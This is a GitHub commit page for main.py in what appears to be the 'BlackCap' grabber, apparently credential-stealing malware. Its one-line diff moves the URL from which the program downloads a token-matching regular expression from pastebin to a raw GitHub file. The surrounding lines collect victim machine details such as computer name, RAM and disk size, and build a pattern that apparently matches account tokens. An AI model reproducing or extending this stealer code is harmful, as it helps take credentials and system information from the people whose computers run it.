Update main.py

This commit is contained in:
What about KSCH 2023-02-11 19:07:53 +01:00 committed by GitHub
parent 65d3473d08
commit 7919d32e2e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -116,7 +116,7 @@ vctm_pc = os.getenv("COMPUTERNAME")
r4m = str(psutil.virtual_memory()[0] / 1024 ** 3).split(".")[0]
d1sk = str(psutil.disk_usage('/')[0] / 1024 ** 3).split(".")[0]
BlackCap_Regex = 'https://pastebin.com/raw/f4PM9Dse'
BlackCap_Regex = 'https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/super_secret_regex.txt'
reg_req = requests.get(BlackCap_Regex)
clear_reg = r"[\w-]{24}" + reg_req.text